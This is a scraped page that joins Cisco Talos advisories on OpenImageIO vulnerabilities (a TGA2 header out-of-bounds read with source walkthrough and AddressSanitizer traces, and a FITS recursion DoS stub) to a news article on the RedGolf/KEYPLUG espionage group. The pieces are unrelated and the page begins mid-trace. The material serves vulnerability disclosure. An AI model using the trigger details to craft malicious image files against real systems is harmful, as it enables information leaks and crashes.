        #3 0x7ffff2bd6fc8 in OpenImageIO_v2_4::ImageInput::read_native_scanlines(int, int, int, int, int, void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:399:19
        #4 0x7ffff2bd7cfd in OpenImageIO_v2_4::ImageInput::read_native_scanlines(int, int, int, int, int, int, int, void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:420:16
        #5 0x7ffff2bd3780 in OpenImageIO_v2_4::ImageInput::read_scanlines(int, int, int, int, int, int, int, OpenImageIO_v2_4::TypeDesc, void*, long, long) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:336:15
        #6 0x7ffff2bf57d9 in OpenImageIO_v2_4::ImageInput::read_image(int, int, int, int, OpenImageIO_v2_4::TypeDesc, void*, long, long, long, bool (*)(void*, float), void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:967:23
        #7 0x7ffff2bef13a in OpenImageIO_v2_4::ImageInput::read_image(OpenImageIO_v2_4::TypeDesc, void*, long, long, long, bool (*)(void*, float), void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:864:12
        #8 0x55555566fab4 in LLVMFuzzerTestOneInput /oiio/fuzzing/./oiio_harness.cpp:90:18
        #9 0x5555555954e3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x414e3) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #10 0x55555557f25f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x2b25f) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #11 0x555555584fb6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/oiio/fuzzing/fuzz_oiio.bin+0x30fb6) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #12 0x5555555aedd2 in main (/oiio/fuzzing/fuzz_oiio.bin+0x5add2) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #13 0x7fffebfc9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #14 0x7fffebfc9e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #15 0x555555579b24 in _start (/oiio/fuzzing/fuzz_oiio.bin+0x25b24) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
    
    0x61500000417d is located 125 bytes to the right of 512-byte region [0x615000003f00,0x615000004100)
    allocated by thread T0 here:
        #0 0x55555566ca1d in operator new[](unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x118a1d) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #1 0x7ffff3c17256 in OpenImageIO_v2_4::TGAInput::readimg() /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:713:23
        #2 0x7ffff3c24f09 in OpenImageIO_v2_4::TGAInput::read_native_scanline(int, int, int, int, void*) /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:881:14
        #3 0x7ffff2bd6fc8 in OpenImageIO_v2_4::ImageInput::read_native_scanlines(int, int, int, int, int, void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:399:19
        #4 0x7ffff2bd7cfd in OpenImageIO_v2_4::ImageInput::read_native_scanlines(int, int, int, int, int, int, int, void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:420:16
        #5 0x7ffff2bd3780 in OpenImageIO_v2_4::ImageInput::read_scanlines(int, int, int, int, int, int, int, OpenImageIO_v2_4::TypeDesc, void*, long, long) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:336:15
        #6 0x7ffff2bf57d9 in OpenImageIO_v2_4::ImageInput::read_image(int, int, int, int, OpenImageIO_v2_4::TypeDesc, void*, long, long, long, bool (*)(void*, float), void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:967:23
        #7 0x7ffff2bef13a in OpenImageIO_v2_4::ImageInput::read_image(OpenImageIO_v2_4::TypeDesc, void*, long, long, long, bool (*)(void*, float), void*) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageinput.cpp:864:12
        #8 0x55555566fab4 in LLVMFuzzerTestOneInput /oiio/fuzzing/./oiio_harness.cpp:90:18
        #9 0x5555555954e3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x414e3) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #10 0x55555557f25f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x2b25f) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #11 0x555555584fb6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/oiio/fuzzing/fuzz_oiio.bin+0x30fb6) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #12 0x5555555aedd2 in main (/oiio/fuzzing/fuzz_oiio.bin+0x5add2) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #13 0x7fffebfc9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    
    
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /oiio/oiio-2.4.6.0/src/targa.imageio/targainput.cpp:574:47 in OpenImageIO_v2_4::TGAInput::decode_pixel(unsigned char*, unsigned char*, unsigned char*, int,
     int)
    Shadow bytes around the buggy address:
      0x0c2a7fff87d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fff87e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fff87f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fff8800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fff8810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2a7fff8820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
      0x0c2a7fff8830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fff8840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fff8850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fff8860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fff8870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==447210==ABORTING
    [Thread 0x7fffe66f9640 (LWP 447213) exited]
    [Inferior 1 (process 447210) exited with code 01]
    

**TIMELINE**

2023-02-07 - Vendor Disclosure  
2023-02-13 - Vendor Patch Release  
2023-03-30 - Public Release

Discovered by Lilith >\_> of Cisco Talos.

CVE-2023-22845: TALOS-2023-1708 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the TGAInput::read_tga2_header functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted targa file can lead to a disclosure of sensitive information. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

An information disclosure vulnerability exists in the TGAInput::read\_tga2\_header functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted targa file can lead to a disclosure of sensitive information. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenImageIO Project OpenImageIO v2.4.7.1

**PRODUCT URLS**

OpenImageIO - https://github.com/OpenImageIO/oiio

**CVSSv3 SCORE**

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

**CWE**

CWE-125 - Out-of-bounds Read

**DETAILS**

OpenImageIO is an image processing library with easy-to-use interfaces and a sizable number of supported image formats. Useful for conversion and processing and even image comparison, this library is utilized by 3D-processing software from AliceVision (including Meshroom), as well as Blender for reading Photoshop .psd files.

When reading in Targa (.tga) files, the libOpenImageIO code flows are pretty quick and easy, matching the relative simpleness of the file format itself. Starting with TGAInput::open(const std::stirng &name, ImageSpec& newspec):

    bool
    TGAInput::open(const std::string& name, ImageSpec& newspec)
    {
        m_filename = name;
    
        DBG("TGA opening {}\n", name);
        if (!ioproxy_use_or_open(name))
            return false;
        ioseek(0);
    
        // Due to struct packing, we may get a corrupt header if we just load the
        // struct from file; to address that, read every member individually save
        // some typing. Byte swapping is done automatically. If any fail, the file
        // handle is closed and we return false from open().
        if (!(read(m_tga.idlen) && read(m_tga.cmap_type) && read(m_tga.type)
              && read(m_tga.cmap_first) && read(m_tga.cmap_length)
              && read(m_tga.cmap_size) && read(m_tga.x_origin)
              && read(m_tga.y_origin) && read(m_tga.width) && read(m_tga.height)
              && read(m_tga.bpp) && read(m_tga.attr))) {
            errorfmt("Could not read full header");
            return false;
        }
    

The file is opened and we start reading the appropriate fields into the following struct:

    <(^.^)>#ptype m_tga
    type = struct {
        uint8_t idlen;
        uint8_t cmap_type;
        uint8_t type;
        uint16_t cmap_first;
        uint16_t cmap_length;
        uint8_t cmap_size;
        uint16_t x_origin;
        uint16_t y_origin;
        uint16_t width;
        uint16_t height;
        uint8_t bpp;
        uint8_t attr;
    }
    

Assorted validation on these parameters occurs, but is not really worth delving into. Assuming we pass all the checks, we end up reading the last 26 bytes of the file to see if it’s a TGA 2.0 image, which will require extra parsing:

    // now try and see if it's a TGA 2.0 image
    // TGA 2.0 files are identified by a nifty "TRUEVISION-XFILE.\0" signature
    bool check_for_tga2 = (ioproxy()->size() > 26 + 18);
    if (check_for_tga2 && !ioseek(-26, SEEK_END)) {
        errorfmt("Could not seek to find the TGA 2.0 signature.");
        return false;
    }
    if (check_for_tga2 && read(m_foot.ofs_ext) && read(m_foot.ofs_dev)  // [1]
        && ioread(&m_foot.signature, sizeof(m_foot.signature), 1)
        && !strncmp(m_foot.signature, "TRUEVISION-XFILE.", 17)) {
        //std::cerr << "[tga] this is a TGA 2.0 file\n";
        m_tga_version = 2;
        if (!read_tga2_header())   //[2]
            return false;
    } else {
        m_tga_version = 1;
    }
    

Assuming that the correct magic bytes are found in the branch at \[1\], we read in the tga2 header starting at \[2\]:

    bool
    TGAInput::read_tga2_header()
    {
        // read the extension area
        if (!ioseek(m_foot.ofs_ext)) {
            return false;
        }
        // check if this is a TGA 2.0 extension area
        // according to the 2.0 spec, the size for valid 2.0 files is exactly
        // 495 bytes, and the reader should only read as much as it understands
        // for < 495, we ignore this section of the file altogether
        // for > 495, we only read what we know
        uint16_t s;
        if (!read(s))                                                // [3]
            return false;
        //std::cerr << "[tga] extension area size: " << s << "\n";
        if (s >= 495) {
            union {
                unsigned char c[324];  // so as to accommodate the comments // [4]
                uint16_t s[6];
                uint32_t l;
            } buf;
    
            // load image author
            if (!ioread(buf.c, 41, 1))
                return false;
            if (buf.c[0])
                m_spec.attribute("Artist", (char*)buf.c);
    
            // load image comments
            if (!ioread(buf.c, 324, 1))                               // [5]
                return false;
    

The comments above give the flow, but for extra context, we read in the size of our extension information at \[3\] and then start reading the various fields into the buf union at \[4\]. It’s important to note that the populating function ioread does not null terminate nor truncate the input at all, so the line at \[5\] ends up completely filling up the buf union, which becomes important soon.

            // concatenate the lines into a single string
            std::string tmpstr = Strutil::safe_string((const char*)buf.c, 81);   // [6]
            if (buf.c[81]) {
                tmpstr += "\n";
                tmpstr += Strutil::safe_string((const char*)&buf.c[81], 81);
            }
            if (buf.c[162]) {
                tmpstr += "\n";
                tmpstr += Strutil::safe_string((const char*)&buf.c[162], 81);
            }
            if (buf.c[243]) {
                tmpstr += "\n";
                tmpstr += Strutil::safe_string((const char*)&buf.c[243], 81);
            }
            if (tmpstr.length() > 0)
                m_spec.attribute("ImageDescription", tmpstr);
    
            // timestamp
            if (!ioread(buf.s, 2, 6))
                return false;
            if (buf.s[0] || buf.s[1] || buf.s[2] || buf.s[3] || buf.s[4]
                || buf.s[5]) {
                if (bigendian())
                    swap_endian(&buf.s[0], 6);
                m_spec.attribute(
                    "DateTime",
                    Strutil::fmt::format("{:04}:{:02}:{:02} {:02}:{:02}:{:02}",
                                         buf.s[2], buf.s[0], buf.s[1], buf.s[3],
                                         buf.s[4], buf.s[5]));
            }
    

While the calls to Strutil::safe_string starting at \[6\] correctly limit the amount of bytes that get read in from our temporary buf buffer (a change made in response to a similar vulnerability in this function), and subsequent reads are non-string based, if we look further into the function, we see an issue:

            // job name/ID
            if (!ioread(buf.c, 41, 1))
                return false;
            if (buf.c[0])
                m_spec.attribute("DocumentName", (char*)buf.c);           // [7]
    
            // job time
            if (!ioread(buf.s, 2, 3))
                return false;
            if (buf.s[0] || buf.s[1] || buf.s[2]) {
                if (bigendian())
                    swap_endian(&buf.s[0], 3);
                m_spec.attribute("targa:JobTime",
                                 Strutil::fmt::format("{}:{:02}:{:02}", buf.s[0],
                                                      buf.s[1], buf.s[2]));
            }
    
            // software
            if (!ioread(buf.c, 41, 1))
                return false;
            uint16_t n;
            char l;
            if (!read(n) || !read(l))
                return false;
            if (buf.c[0]) {                               
                // tack on the version number and letter
                std::string soft((const char*)buf.c);                     // [8]
                soft += Strutil::fmt::format(" {}.{}", n / 100, n % 100);
                if (l != ' ')
                    soft += l;
                m_spec.attribute("Software", soft);
            }
    

Since there is no forced null termination on the buf buffer, it is possible for our input file to just not have a null inside the read at \[5\]. This leads the m_spec.attribute call at \[7\] and the std::string creation at \[8\] to both read out of bounds on the stack when generating our metadata, since they both search for a terminating null byte to determine the string length. If the buf variable was one byte longer with a null at the end, or if buf was zeroed and then the ioread at \[5\] was one byte less, this would not be an issue. Alas, depending on how the compiler arranges our stack variables, different leaked information will be stored into the resultant image object.

**Crash Information**

    ==591817==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff8b74 at pc 0x5555555c4e56 bp 0x7fffffff8950 sp 0x7fffffff8118
    READ of size 327 at 0x7fffffff8b74 thread T0
    [Detaching after fork from child process 591841]
        #0 0x5555555c4e55 in strlen (/oiio/fuzzing/fuzz_oiio.bin+0x70e55) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #1 0x7ffff0096e5c in std::char_traits<char>::length(char const*) /usr/bin/../lib/gcc/x86_64-linux-gnu/12/../../../../include/c++/12/bits/char_traits.h:395:9
        #2 0x7fffeff004c3 in OpenImageIO_v2_4::basic_string_view<char, std::char_traits<char> >::basic_string_view(char const*) /oiio/oiio-2.4.7.1/src/include/OpenImageIO/string_view.h:108:41
        #3 0x7ffff3c03e91 in OpenImageIO_v2_4::TGAInput::read_tga2_header() /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:371:46
        #4 0x7ffff3bfe099 in OpenImageIO_v2_4::TGAInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_4::ImageSpec&) /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:267:14
        #5 0x7ffff3c0a007 in OpenImageIO_v2_4::TGAInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_4::ImageSpec&, OpenImageIO_v2_4::ImageSpec const&) /oiio/oiio-2.4.7.1/src/ta
    rga.imageio/targainput.cpp:298:12
        #6 0x7ffff2cebce9 in OpenImageIO_v2_4::ImageInput::create(OpenImageIO_v2_4::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v2_4::ImageSpec const*, OpenImageIO_v2_4::Filesystem::IOProxy*, OpenImageIO_v2_4::basic_string_view<char, std::char_traits<
    char> >) /oiio/oiio-2.4.7.1/src/libOpenImageIO/imageioplugin.cpp:786:27
        #7 0x7ffff2bc51c9 in OpenImageIO_v2_4::ImageInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_4::ImageSpec const*, OpenImageIO_v2_4::Filesystem::IOProxy*) /oiio/oiio-2.
    4.7.1/src/libOpenImageIO/imageinput.cpp:112:16
        #8 0x55555566f40f in LLVMFuzzerTestOneInput /oiio/fuzzing/./oiio_harness.cpp:77:16
        #9 0x5555555954e3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x414e3) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #10 0x55555557f25f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/oiio/fuzzing/fuzz_oiio.bin+0x2b25f) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #11 0x555555584fb6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/oiio/fuzzing/fuzz_oiio.bin+0x30fb6) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #12 0x5555555aedd2 in main (/oiio/fuzzing/fuzz_oiio.bin+0x5add2) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
        #13 0x7fffebfc9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #14 0x7fffebfc9e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #15 0x555555579b24 in _start (/oiio/fuzzing/fuzz_oiio.bin+0x25b24) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea)
    
    Address 0x7fffffff8b74 is located in stack of thread T0 at offset 372 in frame
        #0 0x7ffff3bfff2f in OpenImageIO_v2_4::TGAInput::read_tga2_header() /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:305
    
      This frame has 40 object(s):
        [32, 34) 's' (line 315)
        [48, 372) 'buf' (line 320)
        [448, 464) 'agg.tmp' <== Memory access at offset 372 partially underflows this variable
        [480, 496) 'agg.tmp32' <== Memory access at offset 372 partially underflows this variable
        [512, 544) 'tmpstr' (line 337) <== Memory access at offset 372 partially underflows this variable
        [576, 608) 'ref.tmp' (line 340) <== Memory access at offset 372 partially underflows this variable
        [640, 672) 'ref.tmp81' (line 344) <== Memory access at offset 372 partially underflows this variable
        [704, 736) 'ref.tmp108' (line 348)
        [768, 784) 'agg.tmp133'
        [800, 816) 'agg.tmp134'
        [832, 848) 'agg.tmp209'
        [864, 880) 'agg.tmp210'
        [896, 928) 'ref.tmp211' (line 360)
        [960, 976) 'agg.tmp286'
        [992, 1008) 'agg.tmp287'
        [1024, 1040) 'agg.tmp335'
        [1056, 1072) 'agg.tmp336'
        [1088, 1120) 'ref.tmp337' (line 379)
        [1152, 1154) 'n' (line 387)
        [1168, 1169) 'l' (line 388)
        [1184, 1216) 'soft' (line 393)
        [1248, 1249) 'ref.tmp395' (line 393)
        [1264, 1296) 'ref.tmp400' (line 394)
        [1328, 1332) 'ref.tmp401' (line 394)
        [1344, 1348) 'ref.tmp404' (line 394)
        [1360, 1376) 'agg.tmp431'
        [1392, 1408) 'agg.tmp432'
        [1424, 1440) 'agg.tmp474'
        [1456, 1460) 'gamma' (line 423)
        [1472, 1488) 'agg.tmp539'
        [1504, 1520) 'agg.tmp540'
        [1536, 1552) 'agg.tmp550'
        [1568, 1584) 'agg.tmp551'
        [1600, 1632) 'ref.tmp552' (line 432)
        [1664, 1680) 'agg.tmp566'
        [1696, 1712) 'agg.tmp630'
        [1728, 1730) 'res' (line 473)
        [1744, 1760) 'agg.tmp685'
        [1776, 1792) 'agg.tmp698'
        [1808, 1824) 'agg.tmp715'
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/oiio/fuzzing/fuzz_oiio.bin+0x70e55) (BuildId: c47f4a88ed888e6af376abd149e3cfe6bd24ceea) in strlen
    Shadow bytes around the buggy address:
      0x10007fff7110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7140: f1 f1 f1 f1 02 f2 00 00 00 00 00 00 00 00 00 00
      0x10007fff7150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff7160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[04]f2
      0x10007fff7170: f2 f2 f2 f2 f2 f2 f2 f2 00 00 f2 f2 00 00 f2 f2
      0x10007fff7180: 00 00 00 00 f2 f2 f2 f2 f8 f8 f8 f8 f2 f2 f2 f2
      0x10007fff7190: f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f2 f2 f2 f2
      0x10007fff71a0: 00 00 f2 f2 00 00 f2 f2 00 00 f2 f2 00 00 f2 f2
      0x10007fff71b0: f8 f8 f8 f8 f2 f2 f2 f2 00 00 f2 f2 00 00 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==591817==ABORTING
    

**TIMELINE**

2023-02-07 - Vendor Disclosure  
2023-02-13 - Vendor Patch Release  
2023-03-30 - Public Release

Discovered by Lilith >\_> of Cisco Talos.

CVE-2023-24473: TALOS-2023-1707 || Cisco Talos Intelligence Group

A denial of service vulnerability exists in the FitsOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide malicious input to trigger this vulnerability.

**SUMMARY**

A denial of service vulnerability exists in the FitsOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide malicious input to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenImageIO Project OpenImageIO v2.4.7.1

**PRODUCT URLS**

OpenImageIO - https://github.com/OpenImageIO/oiio

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-674 - Uncontrolled Recursion

**DETAILS**

OpenImageIO is an image processing library with easy-to-use interfaces and a sizable number of supported image formats. Useful for conversion and processing and even image comparison, this library is utilized by 3D-processing software from AliceVision (including Meshroom), as well as Blender for reading Photoshop .psd files.

CVE-2022-43595 was not fixed in newest version.

**TIMELINE**

2023-02-07 - Vendor Disclosure  
2023-02-13 - Vendor Patch Release  
2023-03-30 - Public Release

Discovered by Lilith >\_> of Cisco Talos.

CVE-2023-24472: TALOS-2023-1709 || Cisco Talos Intelligence Group

A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.
"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.
"The group has shown the ability to

Endpoint Security / Malware

A Chinese state-sponsored threat activity group tracked as **RedGolf** has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.

"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.

"The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon) and has a history of developing and using a large range of custom malware families."

The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Manidant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022.

Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG.

Both these campaigns were attributed to Winnti (aka APT41, Barium, Bronze Atlas, or Wicked Panda), which Recorded Future said "closely overlaps" with RedGolf.

"We have not observed specific victimology as part of the latest highlighted RedGolf activity," Recorded Future said. "However, we believe this activity is likely being conducted for intelligence purposes rather than financial gain due to the overlaps with previously reported cyberespionage campaigns."

The cybersecurity firm, in addition to detecting a cluster of KEYPLUG samples and operational infrastructure (codenamed GhostWolf) used by the hacking group from at least 2021 to 2023, noted its use of other tools like Cobalt Strike and PlugX.

The GhostWolf infrastructure, for its part, consists of 42 IP addresses that function as KEYPLUG command-and-control. The adversarial collective has also been observed utilizing a mixture of both traditionally registered domains and Dynamic DNS domains, often featuring a technology theme, to act as communication points for Cobalt Strike and PlugX.

"RedGolf will continue to demonstrate a high operational tempo and rapidly weaponize vulnerabilities in external-facing corporate appliances (VPNs, firewalls, mail servers, etc.) to gain initial access to target networks," the company said.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

"Additionally, the group will likely continue to adopt new custom malware families to add to existing tooling such as KEYPLUG."

To defend against RedGolf attacks, organizations are recommended to apply patches regularly, monitor access to external facing network devices, track and block identified command-and-control infrastructure, and configure intrusion detection or prevention systems to monitor for malware detections.

The findings come as Trend Micro revealed that it discovered more than 200 victims of Mustang Panda (aka Earth Preta) attacks as part of a far-reaching cyber espionage effort orchestrated by various sub-groups since 2022.

A majority of the cyber strikes have been detected in Asia, followed by Africa, Europe, the Middle East, Oceania, North America, and South America.

"There are strong indications of intertwined traditional intelligence tradecraft and cyber collection efforts, indicative of a highly coordinated and sophisticated cyber espionage operation," Trend Micro said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel